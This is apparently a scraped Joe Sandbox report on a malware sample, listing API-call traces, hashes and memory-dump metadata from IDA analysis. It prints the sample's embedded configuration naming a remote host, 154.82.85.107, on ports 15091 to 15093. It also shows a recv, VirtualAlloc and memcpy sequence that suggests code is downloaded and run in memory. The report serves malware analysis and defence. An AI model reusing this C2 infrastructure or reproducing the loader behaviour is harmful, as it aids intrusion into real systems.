• Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
Similarity
• API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
• String ID:
• API String ID: 1116298128-0
• Opcode ID: d2bbf2aa721f114251104c6910637086deae85c933c4be868d38b06a03e86fbc
• Instruction ID: 9954b14dcdc31069d3e5eb2789a35be1032f91c0d929ffd2de948a12ef8778c2
• Opcode Fuzzy Hash: d2bbf2aa721f114251104c6910637086deae85c933c4be868d38b06a03e86fbc
• Instruction Fuzzy Hash: 66018CF1A00B408FC7319F6A9844A07FAF8FF98710B108A1ED6DAC7A10D374A149CF95
APIs
• HeapCreate.KERNEL32(00000004,00000000,00000000,0307E04E,00000000,03079800,?,?,?,00000000,0309125B,000000FF,?,0307E04E), ref: 0307CD1B
• _free.LIBCMT ref: 0307CD56
  • Part of subcall function 03071280: __CxxThrowException@8.LIBCMT ref: 03071290
  • Part of subcall function 03071280: DeleteCriticalSection.KERNEL32(00000000,0307D3E6,03096624,?,?,0307D3E6,?,?,?,?,03095A40,00000000), ref: 030712A1
Memory Dump Source
• Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
• Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
• String ID:
• API String ID: 1116298128-0
• Opcode ID: 4c53b61631f531b02aef240f0948d1144d9147213f88b6babf81145a111df3b3
• Instruction ID: 541ac0f29ade99a06c7807f6a7bbe64bc1c375e1f86dc2294b90d074dae7de09
• Opcode Fuzzy Hash: 4c53b61631f531b02aef240f0948d1144d9147213f88b6babf81145a111df3b3
• Instruction Fuzzy Hash: C2017AB0A02B449FD330DF6A9844A47FAE8BF98700B104A1ED2DACAA10D374A505CF55
APIs
• SetErrorMode.KERNEL32(00008000), ref: 0042861E
• LoadLibraryW.KERNEL32(00000000,00000000,00428668,?,00000000,00428686,?,00008000), ref: 0042864D
Memory Dump Source
• Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: ErrorLibraryLoadMode
• String ID:
• API String ID: 2987862817-0
• Opcode ID: 46fa6bf7c39c9205b4f2e33c71be27e1bd0f5d6462176cf82db7d2d05287f296
• Instruction ID: 872fb0b1150bba30eaf2acd4e0c3a99a1078ee24a947000b27c0355be161ab5f
• Opcode Fuzzy Hash: 46fa6bf7c39c9205b4f2e33c71be27e1bd0f5d6462176cf82db7d2d05287f296
• Instruction Fuzzy Hash: 81F02770A14744BFDB119F768C6286FBBECE70DB0079348BAF900E2A91EA3C4810C568
APIs
• CreateThread.KERNEL32 ref: 0307E49B
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,03081168,?,?,?,?,?,?,03096298,0000000C,03081210,?), ref: 0307E4A9
Memory Dump Source
• Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
• Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: CreateObjectSingleThreadWait
• String ID:
• API String ID: 1891408510-0
• Opcode ID: 7a1919bda59554dd7c41b6dc9157994956e2cdaaf3467fbddabcfac3bc11e734
• Instruction ID: 8dd81496169c418f36b890f93a33490c68b384987cefbf33c9e58eb6a9700b45
• Opcode Fuzzy Hash: 7a1919bda59554dd7c41b6dc9157994956e2cdaaf3467fbddabcfac3bc11e734
• Instruction Fuzzy Hash: 13E012B084660DBFDB14EB58EC84E3673DCE714330B104667B920D6248D539D860C7A4
APIs
• __getptd.LIBCMT ref: 02717181
  • Part of subcall function 0271990F: __getptd_noexit.LIBCMT ref: 02719912
  • Part of subcall function 0271990F: __amsg_exit.LIBCMT ref: 0271991F
  • Part of subcall function 02717156: __getptd_noexit.LIBCMT ref: 0271715B
  • Part of subcall function 02717156: __freeptd.LIBCMT ref: 02717165
  • Part of subcall function 02717156: ExitThread.KERNEL32 ref: 0271716E
• __XcptFilter.LIBCMT ref: 027171A2
  • Part of subcall function 02719C41: __getptd_noexit.LIBCMT ref: 02719C47
Memory Dump Source
• Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
• Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
Similarity
• API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
• String ID:
• API String ID: 418257734-0
• Opcode ID: 4f9a4f44e2bda25c9b9b8cc9a8d41fd2eace26c8fe9e34d96c0ba833193d8b12
• Instruction ID: 77924cce29cc9be055ac4a5ca98a50e1b61d6e23b64a771458c19fb91120bc26
• Opcode Fuzzy Hash: 4f9a4f44e2bda25c9b9b8cc9a8d41fd2eace26c8fe9e34d96c0ba833193d8b12
• Instruction Fuzzy Hash: 4EE012B1A01604EFE70DFBB4C959E6D7B76EF45701F200048E2025B2B5CB75A941EF24
APIs
• __getptd.LIBCMT ref: 0307F98F
  • Part of subcall function 03083E5B: __getptd_noexit.LIBCMT ref: 03083E5E
  • Part of subcall function 03083E5B: __amsg_exit.LIBCMT ref: 03083E6B
  • Part of subcall function 0307F964: __getptd_noexit.LIBCMT ref: 0307F969
  • Part of subcall function 0307F964: __freeptd.LIBCMT ref: 0307F973
  • Part of subcall function 0307F964: ExitThread.KERNEL32 ref: 0307F97C
• __XcptFilter.LIBCMT ref: 0307F9B0
  • Part of subcall function 0308418F: __getptd_noexit.LIBCMT ref: 03084195
Memory Dump Source
• Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
• Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
• String ID:
• API String ID: 418257734-0
• Opcode ID: 823e994e5f303c09bb66f931ea69dfa6aa028a01ab5270af8180a0a35c3df1a8
• Instruction ID: ca5b7758c1f647f1ff017c22e5d8b138feb43beee7f69a9df289cb6fce45e2cf
• Opcode Fuzzy Hash: 823e994e5f303c09bb66f931ea69dfa6aa028a01ab5270af8180a0a35c3df1a8
• Instruction Fuzzy Hash: 91E0C2B8902701EFEB08FBA0C804FBD3734EF84B01F200188E0416F2A0CB399800DB20
                                                                                    APIs
                                                                                    • __lock.LIBCMT ref: 0308641B
                                                                                      • Part of subcall function 03088E5B: __mtinitlocknum.LIBCMT ref: 03088E71
                                                                                      • Part of subcall function 03088E5B: __amsg_exit.LIBCMT ref: 03088E7D
                                                                                      • Part of subcall function 03088E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03083F06,0000000D,03096340,00000008,03083FFF,00000000,?,030810F0,00000000,03096278,00000008,03081155,?), ref: 03088E85
                                                                                    • __tzset_nolock.LIBCMT ref: 0308642C
                                                                                      • Part of subcall function 03085D22: __lock.LIBCMT ref: 03085D44
                                                                                      • Part of subcall function 03085D22: ____lc_codepage_func.LIBCMT ref: 03085D8B
  • Part of subcall function 03085D22: __getenv_helper_nolock.LIBCMT ref: 03085DAD
  • Part of subcall function 03085D22: _free.LIBCMT ref: 03085DE4
  • Part of subcall function 03085D22: _strlen.LIBCMT ref: 03085DEB
  • Part of subcall function 03085D22: __malloc_crt.LIBCMT ref: 03085DF2
  • Part of subcall function 03085D22: _strlen.LIBCMT ref: 03085E08
  • Part of subcall function 03085D22: _strcpy_s.LIBCMT ref: 03085E16
  • Part of subcall function 03085D22: __invoke_watson.LIBCMT ref: 03085E2B
  • Part of subcall function 03085D22: _free.LIBCMT ref: 03085E3A
Memory Dump Source
• Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
• Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
• String ID:
• API String ID: 1828324828-0
APIs
• lstrlenW.KERNEL32(|p1:154.82.85.107|o1:15091|t1:1|p2:154.82.85.107|o2:15092|t2:1|p3:154.82.85.107|o3:15093|t3:1|dd:1|cl:1|fz:), ref: 02714755
  • Part of subcall function 02713260: __wcsrev.LIBCMT ref: 02730655
Strings
• |p1:154.82.85.107|o1:15091|t1:1|p2:154.82.85.107|o2:15092|t2:1|p3:154.82.85.107|o3:15093|t3:1|dd:1|cl:1|fz:, xrefs: 02714750
Memory Dump Source
• Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
• Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
Similarity
• API ID: __wcsrevlstrlen
• String ID: |p1:154.82.85.107|o1:15091|t1:1|p2:154.82.85.107|o2:15092|t2:1|p3:154.82.85.107|o3:15093|t3:1|dd:1|cl:1|fz:
• API String ID: 4062721203-3795792448
APIs
• RegCloseKey.ADVAPI32(80000001,03076E9A), ref: 03076EC9
• RegCloseKey.ADVAPI32(75BF73E0), ref: 03076ED2
Memory Dump Source
• Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
• Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
APIs
• recv.WS2_32(00000280,-0F743538,-0FFFC690,00000000), ref: 1001561B
• realloc.API-MS-WIN-CRT-HEAP-L1-1-0(008D9158,00020000), ref: 10015661
• VirtualAlloc.KERNEL32(00000000,0001C9DB,00003000,00000040), ref: 100156C7
• memcpy.VCRUNTIME140(?,008D9158,0001C9DB), ref: 100156E2
Memory Dump Source
• Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
Similarity
• API ID: AllocVirtualmemcpyreallocrecv
• String ID:
• API String ID: 56598225-0
APIs
• LoadStringW.USER32(00000000,00010000,?,00001000), ref: 0040E4FD
Memory Dump Source
• Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: LoadString
• String ID:
• API String ID: 2948472770-0
APIs
  • Part of subcall function 10012C90: ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(100053B9,?,10012F2A,?,100053B9), ref: 10012C9A
  • Part of subcall function 10012C90: ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP140(CCC35DE5,CCC35DE5,8B55CCCC,?,10012F2A,?,100053B9), ref: 10012CC2
• fclose.API-MS-WIN-CRT-STDIO-L1-1-0(0175FE68,?,100053B9), ref: 10012F4D
Memory Dump Source
• Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
Similarity
• API ID: D@std@@@std@@U?$char_traits@$?eback@?$basic_streambuf@?setg@?$basic_streambuf@D00@fclose
• String ID:
• API String ID: 2996004546-0
APIs
• GetModuleFileNameW.KERNEL32(00400000,?,0000020A), ref: 0040B93E
  • Part of subcall function 0040CBAC: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040CC66,?,00400000,0065DC28), ref: 0040CBE8
  • Part of subcall function 0040CBAC: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040CC66,?,00400000,0065DC28), ref: 0040CC39
Memory Dump Source
• Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
Similarity
• API ID: FileModuleName$LibraryLoad
• String ID:
• API String ID: 4113206344-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
• Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
APIs
  • Part of subcall function 10012F10: fclose.API-MS-WIN-CRT-STDIO-L1-1-0(0175FE68,?,100053B9), ref: 10012F4D
• ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000002,00000000,?,10005395), ref: 1001242D
Memory Dump Source
• Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
Similarity
• API ID: ?setstate@?$basic_ios@D@std@@@std@@U?$char_traits@fclose
• String ID:
• API String ID: 2040537880-0
APIs
Memory Dump Source
• Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
• Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
APIs
• DeleteFileA.KERNEL32(1000A58A,?,1000A58A,00000000,?,?,?,0000005C,?), ref: 10005527
Memory Dump Source
• Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
Similarity
• API ID: DeleteFile
• String ID:
• API String ID: 4033686569-0
                                                                                    • Opcode ID: 3d5163279ec740a988f09b9f2e08219c395a46ee1d8e65d4cb22b1e97629421d
                                                                                    • Instruction ID: f2f8e3d453fe78865ccc53f7e24a17e21a0dec87b166a9a16b5ac37ce018f2ca
                                                                                    • Opcode Fuzzy Hash: 3d5163279ec740a988f09b9f2e08219c395a46ee1d8e65d4cb22b1e97629421d
                                                                                    • Instruction Fuzzy Hash: 5BC02B7520471C57AF808EE4BC448CB33ECD7095C33004000FE0CCB100C532E7019B60
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                     • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 2422867632-0
                                                                                    • Opcode ID: da21fe9d96320cf91e7721b90f7483afcb0a319c9e4ecf3c11d3c7986d5dbfdd
                                                                                    • Instruction ID: 200bb22f749c4f926125f24a398a0d496fe3fdf0cd894fcaee075e241aa98633
                                                                                    • Opcode Fuzzy Hash: da21fe9d96320cf91e7721b90f7483afcb0a319c9e4ecf3c11d3c7986d5dbfdd
                                                                                    • Instruction Fuzzy Hash: EAC048A4B8D224E9F63951682D17B2659203B86B25F608722F7237D8D788A00088D563
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0272FAB1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                     • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentThread
                                                                                    • String ID:
                                                                                    • API String ID: 2882836952-0
                                                                                    • Opcode ID: 73d9b97297f7a4ddd935d8e5a33710043e457d514a00fbfca2d048d5973f3050
                                                                                    • Instruction ID: 039eeac030d10da204218e3ff0b6c004b39d21246c70e942c4047761443042bf
                                                                                    • Opcode Fuzzy Hash: 73d9b97297f7a4ddd935d8e5a33710043e457d514a00fbfca2d048d5973f3050
                                                                                    • Instruction Fuzzy Hash: 8DD012B4104520C7D314EB64C58860EB2F2BF44300F60C915C51A92E10C638E849CAA7
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(?,0042868D), ref: 00428680
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
                                                                                     • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: 66a180434acd903a05dc67d5e34fa237f32a14c00a9ee3962d59800cd762fd6b
                                                                                    • Instruction ID: 696cc173350d5948746636284ada699740c3da0e40302307c28099bcb0f56c81
                                                                                    • Opcode Fuzzy Hash: 66a180434acd903a05dc67d5e34fa237f32a14c00a9ee3962d59800cd762fd6b
                                                                                    • Instruction Fuzzy Hash: 77B09B7670C2145EAF05DBA5791155C67D4D7C87107E1446BF114C3540D97C54148528
                                                                                    APIs
                                                                                    • SetFileAttributesA.KERNEL32(00000000,00000080,?,1000B3D6,?,00000000), ref: 10005751
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                     • Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 123067e2a9cf58ddff2a572c946f291cd475b681d30bc16dccd5dbc98fb432a1
                                                                                    • Instruction ID: ee6079dce25d93f15e917eacbc87c037c8b3b96b664cac2b0563e90788469a29
                                                                                    • Opcode Fuzzy Hash: 123067e2a9cf58ddff2a572c946f291cd475b681d30bc16dccd5dbc98fb432a1
                                                                                    • Instruction Fuzzy Hash: BEB09B3454030C67D5446B51DC59E15771CF7456D1F004450F94D57151CF75FA4447D8
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                     • Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
